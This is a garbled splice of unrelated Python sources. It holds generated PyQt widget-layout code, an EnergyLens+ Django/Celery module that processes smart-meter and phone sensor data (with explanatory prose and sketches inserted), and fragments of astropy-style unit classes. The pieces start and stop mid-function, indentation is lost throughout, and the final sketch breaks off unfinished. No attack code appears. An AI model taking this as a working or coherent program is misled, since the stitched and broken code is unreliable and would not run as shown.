self.ladderFloatInputsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderFloatInputsSB.setObjectName("ladderFloatInputsSB")
self.gridLayout_28.addWidget(self.ladderFloatInputsSB, 15, 1, 1, 1)
self.ladderFloatOutputsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderFloatOutputsSB.setObjectName("ladderFloatOutputsSB")
self.gridLayout_28.addWidget(self.ladderFloatOutputsSB, 16, 1, 1, 1)
self.label_172 = QtWidgets.QLabel(self.ladderGB)
self.label_172.setObjectName("label_172")
self.gridLayout_28.addWidget(self.label_172, 12, 2, 1, 1)
self.label_173 = QtWidgets.QLabel(self.ladderGB)
self.label_173.setObjectName("label_173")
self.gridLayout_28.addWidget(self.label_173, 13, 2, 1, 1)
self.label_174 = QtWidgets.QLabel(self.ladderGB)
self.label_174.setObjectName("label_174")
self.gridLayout_28.addWidget(self.label_174, 14, 2, 1, 1)
self.label_175 = QtWidgets.QLabel(self.ladderGB)
self.label_175.setObjectName("label_175")
self.gridLayout_28.addWidget(self.label_175, 15, 2, 1, 1)
self.label_176 = QtWidgets.QLabel(self.ladderGB)
self.label_176.setObjectName("label_176")
self.gridLayout_28.addWidget(self.label_176, 16, 2, 1, 1)
self.label_177 = QtWidgets.QLabel(self.ladderGB)
self.label_177.setObjectName("label_177")
self.gridLayout_28.addWidget(self.label_177, 0, 0, 1, 1)
self.label_152 = QtWidgets.QLabel(self.plc)
self.label_152.setGeometry(QtCore.QRect(30, 490, 261, 16))
self.label_152.setObjectName("label_152")
self.tabWidget.addTab(self.plc, "")
self.pins = QtWidgets.QWidget()
self.pins.setObjectName("pins")
self.gridLayout_48 = QtWidgets.QGridLayout(self.pins)
self.gridLayout_48.setContentsMargins(8, 8, 8, 8)
self.gridLayout_48.setSpacing(5)
self.gridLayout_48.setObjectName("gridLayout_48")
self.tabWidget_2 = QtWidgets.QTabWidget(self.pins)
self.tabWidget_2.setObjectName("tabWidget_2")
self.tab_4 = QtWidgets.QWidget()
self.tab_4.setObjectName("tab_4")
self.gridLayout_122 = QtWidgets.QGridLayout(self.tab_4)
self.gridLayout_122.setContentsMargins(8, 8, 8, 8)
self.gridLayout_122.setSpacing(5)
self.gridLayout_122.setObjectName("gridLayout_122")
self.gridGroupBox_3 = QtWidgets.QGroupBox(self.tab_4)
self.gridGroupBox_3.setObjectName("gridGroupBox_3")
self.gridLayout_44 = QtWidgets.QGridLayout(self.gridGroupBox_3)
self.gridLayout_44.setContentsMargins(8, 8, 8, 8)
self.gridLayout_44.setSpacing(5)
self.gridLayout_44.setObjectName("gridLayout_44")
self.label_363 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_363.setObjectName("label_363")
self.gridLayout_44.addWidget(self.label_363, 2, 0, 1, 1)
self.label_364 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_364.setObjectName("label_364")
self.gridLayout_44.addWidget(self.label_364, 0, 0, 1, 1)
self.label_365 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_365.setObjectName("label_365")
self.gridLayout_44.addWidget(self.label_365, 8, 0, 1, 1)
self.label_366 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_366.setObjectName("label_366")
self.gridLayout_44.addWidget(self.label_366, 5, 0, 1, 1)
self.label_367 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_367.setObjectName("label_367")
self.gridLayout_44.addWidget(self.label_367, 15, 0, 1, 1)
self.label_368 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_368.setObjectName("label_368")
self.gridLayout_44.addWidget(self.label_368, 4, 0, 1, 1)
self.label_369 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_369.setObjectName("label_369")
self.gridLayout_44.addWidget(self.label_369, 11, 0, 1, 1)
self.label_370 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_370.setObjectName("label_370")
self.gridLayout_44.addWidget(self.label_370, 9, 0, 1, 1)
self.label_371 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_371.setObjectName("label_371")
self.gridLayout_44.addWidget(self.label_371, 13, 0, 1, 1)
self.label_372 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_372.setObjectName("label_372")
self.gridLayout_44.addWidget(self.label_372, 16, 0, 1, 1)
self.label_373 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_373.setObjectName("label_373")
self.gridLayout_44.addWidget(self.label_373, 6, 0, 1, 1)
self.label_374 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_374.setObjectName("label_374")
self.gridLayout_44.addWidget(self.label_374, 12, 0, 1, 1)
self.label_375 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_375.setObjectName("label_375")
self.gridLayout_44.addWidget(self.label_375, 1, 0, 1, 1)
self.label_376 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_376.setObjectName("label_376")
self.gridLayout_44.addWidget(self.label_376, 10, 0, 1, 1)
self.label_377 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_377.setObjectName("label_377")
self.gridLayout_44.addWidget(self.label_377, 3, 0, 1, 1)
self.label_378 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_378.setObjectName("label_378")
self.gridLayout_44.addWidget(self.label_378, 17, 0, 1, 1)
self.label_379 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_379.setObjectName("label_379")
self.gridLayout_44.addWidget(self.label_379, 18, 0, 1, 1)
self.label_380 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_380.setObjectName("label_380")
self.gridLayout_44.addWidget(self.label_380, 19, 0, 1, 1)
self.label_381 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_381.setObjectName("label_381")
self.gridLayout_44.addWidget(self.label_381, 20, 0, 1, 1)
self.label_382 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_382.setObjectName("label_382")
self.gridLayout_44.addWidget(self.label_382, 21, 0, 1, 1)
self.label_383 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_383.setObjectName("label_383")
self.gridLayout_44.addWidget(self.label_383, 22, 0, 1, 1)
self.label_384 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_384.setObjectName("label_384")
self.gridLayout_44.addWidget(self.label_384, 23, 0, 1, 1)
self.label_385 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_385.setObjectName("label_385")
self.gridLayout_44.addWidget(self.label_385, 14, 0, 1, 1)
self.label_386 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_386.setObjectName("label_386")
self.gridLayout_44.addWidget(self.label_386, 7, 0, 1, 1)
self.label_387 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_387.setObjectName("label_387")
self.gridLayout_44.addWidget(self.label_387, 0, 1, 1, 1)
self.label_388 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_388.setObjectName("label_388")
self.gridLayout_44.addWidget(self.label_388, 1, 1, 1, 1)
self.label_389 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_389.setObjectName("label_389")
self.gridLayout_44.addWidget(self.label_389, 2, 1, 1, 1)
self.label_390 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_390.setObjectName("label_390")
self.gridLayout_44.addWidget(self.label_390, 3, 1, 1, 1)
self.label_391 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_391.setObjectName("label_391")
self.gridLayout_44.addWidget(self.label_391, 4, 1, 1, 1)
self.label_392 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_392.setObjectName("label_392")
self.gridLayout_44.addWidget(self.label_392, 5, 1, 1, 1)
self.label_393 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_393.setObjectName("label_393")
self.gridLayout_44.addWidget(self.label_393, 6, 1, 1, 1)
self.label_394 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_394.setObjectName("label_394")
self.gridLayout_44.addWidget(self.label_394, 7, 1, 1, 1)
self.label_395 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_395.setObjectName("label_395")
self.gridLayout_44.addWidget(self.label_395, 8, 1, 1, 1)
self.label_396 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_396.setObjectName("label_396")
self.gridLayout_44.addWidget(self.label_396, 9, 1, 1, 1)
self.label_397 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_397.setObjectName("label_397")
self.gridLayout_44.addWidget(self.label_397, 10, 1, 1, 1)
self.label_398 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_398.setObjectName("label_398")
self.gridLayout_44.addWidget(self.label_398, 11, 1, 1, 1)
self.label_399 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_399.setObjectName("label_399")
self.gridLayout_44.addWidget(self.label_399, 12, 1, 1, 1)
self.label_400 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_400.setObjectName("label_400")
self.gridLayout_44.addWidget(self.label_400, 13, 1, 1, 1)
self.label_401 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_401.setObjectName("label_401")
self.gridLayout_44.addWidget(self.label_401, 14, 1, 1, 1)
self.label_402 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_402.setObjectName("label_402")
self.gridLayout_44.addWidget(self.label_402, 15, 1, 1, 1)
self.label_403 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_403.setObjectName("label_403")
self.gridLayout_44.addWidget(self.label_403, 16, 1, 1, 1)
self.label_404 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_404.setObjectName("label_404")
self.gridLayout_44.addWidget(self.label_404, 17, 1, 1, 1)
self.label_405 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_405.setObjectName("label_405")
self.gridLayout_44.addWidget(self.label_405, 18, 1, 1, 1)
self.label_406 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_406.setObjectName("label_406")
self.gridLayout_44.addWidget(self.label_406, 19, 1, 1, 1)
self.label_407 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_407.setObjectName("label_407")
self.gridLayout_44.addWidget(self.label_407, 20, 1, 1, 1)
self.label_408 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_408.setObjectName("label_408")
self.gridLayout_44.addWidget(self.label_408, 21, 1, 1, 1)
self.label_409 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_409.setObjectName("label_409")
self.gridLayout_44.addWidget(self.label_409, 22, 1, 1, 1)
self.label_410 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_410.setObjectName("label_410")
self.gridLayout_44.addWidget(self.label_410, 23, 1, 1, 1)
self.gridLayout_122.addWidget(self.gridGroupBox_3, 0, 2, 1, 1)
self.gridGroupBox_5 = QtWidgets.QGroupBox(self.tab_4)
self.gridGroupBox_5.setObjectName("gridGroupBox_5")
self.gridLayout_121 = QtWidgets.QGridLayout(self.gridGroupBox_5)
self.gridLayout_121.setContentsMargins(8, 8, 8, 8)
self.gridLayout_121.setSpacing(5)
"""
[CONSUMER] Processes the data generated by the producer
1. Detect edges in real-time over streaming power data
2. Initiates the classification pipeline
3. Detects wastage/usage
4. Sends real-time feedback to user
"""
from __future__ import absolute_import
from energylenserver.setup_django_envt import *
import os
import csv
import time
import math
import random
import string
from types import NoneType
from datetime import timedelta
import pandas as pd
import datetime as dt
from multiprocessing.managers import BaseManager
from django.conf import settings
from celery import shared_task
from django_pandas.io import read_frame
"""
Imports from EnergyLens+
"""
# DB Imports
from energylenserver.models.models import *
from energylenserver.models.DataModels import *
from energylenserver.models import functions as mod_func
# Core Algo imports
from energylenserver.core import classifier
from energylenserver.core.constants import wastage_threshold, upload_interval, no_test_data
from energylenserver.core import functions as core_f
from energylenserver.meter import edge_detection
from energylenserver.core import user_attribution as attrib
from energylenserver.core import apportionment as apprt
from energylenserver.meter import edge_matching as e_match
from energylenserver.core.functions import exists_in_metadata
# GCM Client imports
from energylenserver.gcmxmppclient.messages import create_message
# Reporting API imports
from energylenserver.api import reporting as rpt
# Common imports
from energylenserver.common_imports import *
from energylenserver.constants import apt_no_list
# Enable Logging
upload_logger = logging.getLogger('energylensplus_upload')
logger = logging.getLogger('energylensplus_django')
elogger = logging.getLogger('energylensplus_error')
meter_logger = logging.getLogger('energylensplus_meterdata')
# Global variables
base_dir = settings.BASE_DIR
dst_folder = os.path.join(base_dir, 'energylenserver/data/phone/')
# Offline Processing imports
from energylenserver.common_offline import *
# Model mapping with filenames
FILE_MODEL_MAP = {
'wifi': (WiFiTestData, "WiFiTestData"),
'rawaudio': (RawAudioTestData, "RawAudioTestData"),
'audio': (MFCCFeatureTestSet, "MFCCFeatureTestSet"),
'accelerometer': (AcclTestData, "AcclTestData"),
'light': (LightTestData, "LightTestData"),
'mag': (MagTestData, "MagTestData"),
'Trainingwifi': (WiFiTrainData, "WiFiTrainData"),
'Trainingrawaudio': (RawAudioTrainData, "RawAudioTrainData"),
'Trainingaudio': (MFCCFeatureTrainSet, "MFCCFeatureTrainSet"),
'Trainingaccelerometer': (AcclTrainData, "AcclTrainData"),
'Traininglight': (LightTrainData, "LightTrainData"),
'Trainingmag': (MagTrainData, "MagTrainData")
}
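The FILE_MODEL_MAP above dispatches each uploaded file to its database model by sensor name, with a 'Training' prefix selecting the training-set model. A minimal sketch of the same dispatch pattern, using hypothetical stand-in classes instead of the real Django models:

```python
# Sketch of the sensor-name -> model dispatch used by phoneDataHandler.
# The real map points at Django model classes; _StubModel is a stand-in.

class _StubModel:
    """Hypothetical stand-in for a Django model class."""
    def __init__(self, name):
        self.name = name

MODEL_MAP = {
    'wifi': (_StubModel('WiFiTestData'), "WiFiTestData"),
    'Trainingwifi': (_StubModel('WiFiTrainData'), "WiFiTrainData"),
}

def resolve_model(sensor_name, training):
    # Training uploads reuse the sensor key with a 'Training' prefix
    key = ('Training' + sensor_name) if training else sensor_name
    return MODEL_MAP[key]

model, table_name = resolve_model('wifi', training=True)
```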
class ClientManager(BaseManager):
pass
'''
# Commented for offline processing
# Establishing connection with the running GCM Server
try:
ClientManager.register('get_client_obj')
manager = ClientManager(address=('localhost', 65000), authkey='abracadabra')
manager.connect()
client = manager.get_client_obj()
if client is None or client == "":
logger.debug("GCM Client not connected")
else:
logger.debug("Got the GCM Client: client obj type:: %s", type(client))
except Exception as e:
elogger.error("[InternalGCMClientConnectionException] %s", e)
'''
"""
Helper functions
"""
def create_file(filename):
if not os.path.isfile(filename):
with open(filename, "w+") as myfile:
writer = csv.writer(myfile)
writer.writerow(["timestamp", "filename"])
def write_to_file(filename, data):
with open(filename, "a+") as myfile:
writer = csv.writer(myfile)
writer.writerow(data)
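create_file and write_to_file implement a small CSV-backed upload tracker that phoneDataHandler uses below to deduplicate incoming files. A self-contained sketch of the same pattern (the path here is a temporary file, not the real data_tracker.csv):

```python
import csv
import os
import tempfile

def create_tracker(path):
    # Write the header row only if the tracker does not exist yet
    if not os.path.isfile(path):
        with open(path, "w+") as f:
            csv.writer(f).writerow(["timestamp", "filename"])

def record_upload(path, timestamp, filename):
    # Append one (timestamp, filename) row per processed upload
    with open(path, "a+") as f:
        csv.writer(f).writerow([timestamp, filename])

def already_seen(path, filename):
    # Skip the header, then scan the filename column
    with open(path) as f:
        return any(row and row[1] == filename
                   for row in list(csv.reader(f))[1:])

tracker = os.path.join(tempfile.mkdtemp(), "tracker.csv")
create_tracker(tracker)
record_upload(tracker, 1000.0, "wifi_001.csv")
seen = already_seen(tracker, "wifi_001.csv")      # duplicate upload
unseen = already_seen(tracker, "wifi_002.csv")    # new upload
```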
"""
Data Handlers
"""
@shared_task
def phoneDataHandler(filename, sensor_name, filepath, training_status, user):
"""
Consumes sensor data streams from the phone
Performs some preprocessing and inserts records
into the database
:param filename:
:param sensor_name:
:param filepath:
:param training_status:
:param user:
:return upload status:
"""
try:
filepath_full = os.path.join(dst_folder, "data_tracker.csv")
now_time = time.time()
# Check existence of data file tracker and act accordingly
if os.path.isfile(filepath_full):
ftracker_df = pd.read_csv(filepath_full)
if len(ftracker_df) > 0:
flag = False
# Don't go ahead if file already been dealt with
if filename in ftracker_df.filename.tolist():
flag = True
logger.debug("File %s already inserted in the database!", filename)
# Create new file if entries older than 5 days
start_timestamp = ftracker_df.ix[0]['timestamp']
if now_time - start_timestamp >= 5 * 24 * 3600:
# new_file = os.path.join(dst_folder,
# "prev_data_tracker_" + str(int(now_time)) + "_.csv")
# Delete the tracker file
try:
os.unlink(filepath_full)
except Exception as e:
logger.error("Deletion of tracker file failed ::%s", e)
# Create new file
create_file(filepath_full)
if flag:
os.remove(filepath)
return
else:
create_file(filepath_full)
# Create a dataframe for preprocessing
if sensor_name != 'rawaudio':
try:
df_csv = pd.read_csv(filepath)
except Exception as e:
logger.error("[InsertDataException]::%s", str(e))
os.remove(filepath)
return
# Remove rows with 'Infinity' in MFCCs created
if sensor_name == 'audio':
if str(df_csv.mfcc1.dtype) != 'float64':
df_csv = df_csv[df_csv.mfcc1 != '-Infinity']
if sensor_name != 'rawaudio':
# logger.debug("Total number of records to insert: %d", len(df_csv))
# Remove NAN timestamps
df_csv.dropna(subset=[0], inplace=True)
# Create temp csv file
os.remove(filepath)
df_csv.to_csv(filepath, index=False)
# --Initialize Model--
if training_status is True:
model = FILE_MODEL_MAP['Training' + sensor_name]
else:
model = FILE_MODEL_MAP[sensor_name]
# --Store data in the model--
model[0]().insert_records(user, filepath, model[1])
# Add an entry to the db -- to prevent data duplication
record = [now_time, filename]
write_to_file(filepath_full, record)
logger.debug("FILE:: %s", filename)
'''
if sensor_name != 'rawaudio':
logger.debug("FILE:: %s", filename)
if len(df_csv) > 0:
logger.debug("%s[%s] -- [%s]", sensor_name,
time.ctime(df_csv.ix[df_csv.index[0]]['time'] / 1000),
time.ctime(df_csv.ix[df_csv.index[-1]]['time'] / 1000))
else:
logger.debug("%s empty!!", filename)
else:
logger.debug("FILE:: %s", filename)
'''
# Classify location
if sensor_name == 'wifi' and training_status is False:
logger.debug("Classifying new data for: %s with filename: %s", sensor_name, filename)
start_time = df_csv.ix[df_csv.index[0]]['time']
end_time = df_csv.ix[df_csv.index[-1]]['time']
location = classifier.localize_new_data(user.apt_no, start_time, end_time, user)
logger.debug("%s is in %s", user.name, location)
upload_logger.debug("Successful Upload! File: %s", filename)
except Exception as e:
if "No such file or directory" in str(e):
logger.error("[PhoneDataHandlerException]:: %s", e)
else:
logger.exception("[PhoneDataHandlerException]:: %s", e)
@shared_task
def meterDataHandler(df, file_path):
"""
Consumes sensor data streams from the meter
"""
meter_uuid_folder = os.path.dirname(file_path)
uuid = meter_uuid_folder.split('/')[-1]
# Start the process only if participants are registered
try:
meter = MeterInfo.objects.get(meter_uuid=uuid)
except MeterInfo.DoesNotExist as e:
meter_logger.debug("No registered users for this apartment")
return
apt_no = meter.apt_no
meter_logger.debug("Detecting Edges for Apt:: %s UUID:: %s", apt_no, uuid)
apt_users = mod_func.retrieve_users(apt_no)
if apt_users.count() == 0:
meter_logger.debug("No active users for this apartment")
return
try:
# -- Detect Edge --
edges_df = edge_detection.detect_and_filter_edges(df)
except Exception as e:
meter_logger.exception("[OuterDetectEdgeException]:: %s", str(e))
# -- Store edges into db --
if len(edges_df) == 0:
meter_logger.debug("No edges detected")
return
# For the detected edge, store edge and call classification pipeline task
for idx in edges_df.index:
edge = edges_df.ix[idx]
edge_time = edge.time
magnitude = edge.magnitude
try:
# Edge Filter: forward the edge only if it exists in the metadata
data = mod_func.retrieve_metadata(apt_no)
metadata_df = read_frame(data, verbose=False)
in_metadata, matched_md = exists_in_metadata(apt_no, "all", "all",
math.fabs(magnitude),
metadata_df,
meter_logger, "dummy_user")
if not in_metadata:
meter_logger.debug("Detected edge of magnitude %d ignored", magnitude)
continue
# Check if the edge exists in the database
try:
# Edge Filter: filter periodic edges of similar mag
# Cause: fridge or washing machine
obj = Edges.objects.filter(meter=meter).latest('timestamp')
prev_time = int(obj.timestamp)
prev_mag = math.fabs(obj.magnitude)
diff = prev_mag / math.fabs(magnitude)
if (diff > 0.8 and diff <= 1) and (edge_time - prev_time < 60 and
math.fabs(magnitude) < 600):
continue
record = Edges.objects.get(meter=meter, timestamp=edge_time)
except Edges.DoesNotExist as e:
# --Store edge--
edge_r = Edges(timestamp=int(edge_time), time=dt.datetime.fromtimestamp(edge_time),
magnitude=magnitude, type=edge.type,
curr_power=edge.curr_power, meter=meter)
edge_r.save()
meter_logger.debug("Edge for UUID: %s at [%s] of mag %d", uuid, time.ctime(
edge['time']), edge['magnitude'])
# Initiate classification pipeline
edgeHandler(edge_r)
except Exception as e:
meter_logger.error("[EdgeSaveException]:: %s", str(e))
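The periodic-edge filter above suppresses repeated edges of similar magnitude arriving within a minute (e.g. a fridge or washing-machine cycling). Factored out as a pure function for clarity, with the thresholds copied from the code above:

```python
import math

def is_periodic_repeat(prev_mag, prev_time, magnitude, edge_time):
    """Return True if the new edge looks like a periodic repeat of the
    previous one: similar magnitude (ratio in (0.8, 1]), within 60 s,
    and small enough (< 600 W) to be an appliance cycle."""
    mag = math.fabs(magnitude)
    diff = math.fabs(prev_mag) / mag
    return (0.8 < diff <= 1) and (edge_time - prev_time < 60) and (mag < 600)

repeat = is_periodic_repeat(100, 1000, -105, 1030)  # similar mag, 30 s apart
kept = is_periodic_repeat(100, 1000, -700, 1030)    # too large to filter
```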
@shared_task
def edgeHandler(edge):
"""
Starts the classification pipeline and relays edges based on edge type
"""
logger.debug("Starting the Classification pipeline for edge: [%s] :: %d",
time.ctime(edge.timestamp), edge.magnitude)
'''
Commented for offline processing
if edge.type == "falling":
chain = (classify_edge.s(edge) |
find_time_slice.s() | apportion_energy.s())
else:
chain = classify_edge.s(edge)
chain()
'''
if edge.type == "falling":
event_result = classify_edge(edge)
activity_result = find_time_slice(event_result)
apportion_energy(activity_result)
else:
event_result = classify_edge(edge)
# Offline processing - evaluation
logger.debug("Classification Pipeline ended for edge: [%s] :: %d",
time.ctime(edge.timestamp), edge.magnitude)
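edgeHandler runs the full classify → time-slice → apportion chain only for falling (OFF) edges; rising edges stop after classification. The control flow can be factored as a generic sketch, where the three stage functions are hypothetical stand-ins for the tasks defined in this module:

```python
def run_pipeline(edge_type, classify, find_slice, apportion):
    """Run the full chain for falling (OFF) edges; rising (ON) edges
    stop after classification, since energy is apportioned at turn-off."""
    stages = ["classify"]
    result = classify()
    if edge_type == "falling":
        result = find_slice(result)
        result = apportion(result)
        stages += ["find_slice", "apportion"]
    return stages

falling = run_pipeline("falling", lambda: 1, lambda r: r, lambda r: r)
rising = run_pipeline("rising", lambda: 1, lambda r: r, lambda r: r)
```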
"""
Invokes the EnergyLens+ core algorithm
"""
@shared_task
def classify_edge(edge):
"""
Consumes smart meter edges and phone data to give out 'who',
'what', 'where' and 'when'
:param edge:
:return "where", what" and "who" labels:
"""
try:
return_error = 'ignore', 'ignore', 'ignore', 'ignore'
apt_no = edge.meter.apt_no
logger.debug("Apt.No.:: %d Classify edge type '%s' [%s] %d",
apt_no, edge.type, time.ctime(edge.timestamp), edge.magnitude)
# Defining event window
p_window = 60 * 2 # window for each side of the event time (in seconds)
event_time = edge.timestamp
magnitude = edge.magnitude
if edge.type == "rising":
event_type = "ON"
start_time = event_time + 60
end_time = start_time + p_window
else:
event_type = "OFF"
start_time = event_time - p_window
end_time = event_time
# --- Preprocessing ---
# Determine user at home
user_list = core_f.determine_user_home_status(start_time, end_time, apt_no)
n_users_at_home = len(user_list)
if n_users_at_home == 0:
logger.debug("No user at home. Ignoring edge activity.")
return return_error
'''
For offline evaluation
'''
run_no = read_run_no()
run_folder = res_folder + "offline/" + run_no
# Creating event log
event_log = run_folder + '/' + str(apt_no) + '_common_eventLog.csv'
missed_status, sp_status = check_spurious_missed_event(apt_no, event_time)
if is_missed_set() and missed_status:
return return_error
details = ''
if sp_status:
reason = 'spurious'
else:
reason = 'correct'
if not os.path.isfile(event_log):
eval_event_df = pd.DataFrame({'id': [0], 'edge_id': [edge.id],
'timestamp': [event_time], 'magnitude': [magnitude],
'event_type': [event_type], 'apt_no': [apt_no],
'location': ['none'], 'appliance': ['none'],
'dev_id': [unknown_id], 'matched': [0],
'reason': [reason], 'details': [details]},
columns=['id', 'edge_id', 'timestamp', 'magnitude',
'event_type', 'apt_no',
'location', 'appliance', 'dev_id',
'matched', 'reason', 'details'])
eval_event_df.to_csv(event_log, index=False)
else:
eval_event_df = pd.read_csv(event_log)
event_i_df = pd.DataFrame({'id': [len(eval_event_df)], 'edge_id': [edge.id],
'timestamp': [event_time], 'magnitude': [magnitude],
'event_type': [event_type], 'apt_no': [apt_no],
'location': ['none'], 'appliance': ['none'],
'dev_id': [unknown_id], 'matched': [0],
'reason': [reason], 'details': [details]},
columns=['id', 'edge_id', 'timestamp', 'magnitude',
'event_type', 'apt_no',
'location', 'appliance', 'dev_id',
'matched', 'reason', 'details'])
eval_event_df = pd.concat([eval_event_df, event_i_df])
eval_event_df.reset_index(drop=True, inplace=True)
eval_event_df.to_csv(event_log, index=False)
'''
# Commented for offline processing
if event_type == "OFF":
now_time = int(time.time())
if (now_time - event_time) <= 2 * 60:
----------
st : str or list of str
The name of the unit. If a list, the first element is the
canonical (short) name, and the rest of the elements are
aliases.
represents : UnitBase instance
The unit that this named unit represents.
doc : str, optional
A docstring describing the unit.
format : dict, optional
A mapping to format-specific representations of this unit.
For example, for the ``Ohm`` unit, it might be nice to have it
displayed as ``\\Omega`` by the ``latex`` formatter. In that
case, the `format` argument should be set to::
{'latex': r'\\Omega'}
namespace : dictionary, optional
When provided, inject the unit (and all of its aliases) into
the given namespace.
Raises
------
ValueError
If any of the given unit names are already in the registry.
ValueError
If any of the given unit names are not valid Python tokens.
"""
def __init__(self, st, represents=None, doc=None,
format=None, namespace=None):
represents = Unit(represents)
self._represents = represents
NamedUnit.__init__(self, st, namespace=namespace, doc=doc,
format=format)
@property
def represents(self):
"""The unit that this named unit represents."""
return self._represents
def decompose(self, bases=set()):
return self._represents.decompose(bases=bases)
def is_unity(self):
return self._represents.is_unity()
def __hash__(self):
return hash(self.name) + hash(self._represents)
@classmethod
def _from_physical_type_id(cls, physical_type_id):
# get string bases and powers from the ID tuple
bases = [cls(base) for base, _ in physical_type_id]
powers = [power for _, power in physical_type_id]
if len(physical_type_id) == 1 and powers[0] == 1:
unit = bases[0]
else:
unit = CompositeUnit(1, bases, powers)
return unit
class PrefixUnit(Unit):
"""
A unit that is simply a SI-prefixed version of another unit.
For example, ``mm`` is a `PrefixUnit` of ``.001 * m``.
The constructor is the same as for `Unit`.
"""
class CompositeUnit(UnitBase):
"""
Create a composite unit using expressions of previously defined
units.
Direct use of this class is not recommended. Instead use the
factory function `Unit` and arithmetic operators to compose
units.
Parameters
----------
scale : number
A scaling factor for the unit.
bases : sequence of `UnitBase`
A sequence of units this unit is composed of.
powers : sequence of numbers
A sequence of powers (in parallel with ``bases``) for each
of the base units.
"""
def __init__(self, scale, bases, powers, decompose=False,
decompose_bases=set(), _error_check=True):
# There are many cases internal to astropy.units where we
# already know that all the bases are Unit objects, and the
# powers have been validated. In those cases, we can skip the
# error checking for performance reasons. When the private
# kwarg `_error_check` is False, the error checking is turned
# off.
if _error_check:
scale = sanitize_scale(scale)
for base in bases:
if not isinstance(base, UnitBase):
raise TypeError(
"bases must be sequence of UnitBase instances")
powers = [validate_power(p) for p in powers]
self._scale = scale
self._bases = bases
self._powers = powers
self._decomposed_cache = None
self._expand_and_gather(decompose=decompose, bases=decompose_bases)
self._hash = None
def __repr__(self):
if len(self._bases):
return super().__repr__()
else:
if self._scale != 1.0:
return 'Unit(dimensionless with a scale of {0})'.format(
self._scale)
else:
return 'Unit(dimensionless)'
def __hash__(self):
if self._hash is None:
parts = ([str(self._scale)] +
[x.name for x in self._bases] +
[str(x) for x in self._powers])
self._hash = hash(tuple(parts))
return self._hash
@property
def scale(self):
"""
Return the scale of the composite unit.
"""
return self._scale
@property
def bases(self):
"""
Return the bases of the composite unit.
"""
return self._bases
@property
def powers(self):
"""
Return the powers of the composite unit.
"""
return self._powers
def _expand_and_gather(self, decompose=False, bases=set()):
def add_unit(unit, power, scale):
if unit not in bases:
for base in bases:
try:
scale *= unit._to(base) ** power
except UnitsError:
pass
else:
unit = base
break
if unit in new_parts:
a, b = resolve_fractions(new_parts[unit], power)
new_parts[unit] = a + b
else:
new_parts[unit] = power
return scale
new_parts = {}
scale = self.scale
for b, p in zip(self.bases, self.powers):
if decompose and b not in bases:
b = b.decompose(bases=bases)
if isinstance(b, CompositeUnit):
scale *= b._scale ** p
for b_sub, p_sub in zip(b._bases, b._powers):
a, b = resolve_fractions(p_sub, p)
scale = add_unit(b_sub, a * b, scale)
else:
scale = add_unit(b, p, scale)
new_parts = [x for x in new_parts.items() if x[1] != 0]
new_parts.sort(key=lambda x: (-x[1], getattr(x[0], 'name', '')))
self._bases = [x[0] for x in new_parts]
self._powers = [validate_power(x[1]) for x in new_parts]
self._scale = sanitize_scale(scale)
def __copy__(self):
"""
For compatibility with python copy module.
"""
return CompositeUnit(self._scale, self._bases[:], self._powers[:])
def decompose(self, bases=set()):
if len(bases) == 0 and self._decomposed_cache is not None:
return self._decomposed_cache
for base in self.bases:
if (not isinstance(base, IrreducibleUnit) or
(len(bases) and base not in bases)):
break
else:
if len(bases) == 0:
self._decomposed_cache = self
return self
x = CompositeUnit(self.scale, self.bases, self.powers, decompose=True,
decompose_bases=bases)
if len(bases) == 0:
self._decomposed_cache = x
return x
def is_unity(self):
unit = self.decompose()
return len(unit.bases) == 0 and unit.scale == 1.0
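`_expand_and_gather` above flattens nested composite units into a single (base, power) list, summing the powers of repeated bases, dropping zero powers, and sorting. That bookkeeping can be sketched independently of the unit classes, with base units represented as plain strings:

```python
from fractions import Fraction

def gather(parts):
    """Combine (base, power) pairs: sum powers of repeated bases,
    drop zero powers, sort by descending power then by name."""
    acc = {}
    for base, power in parts:
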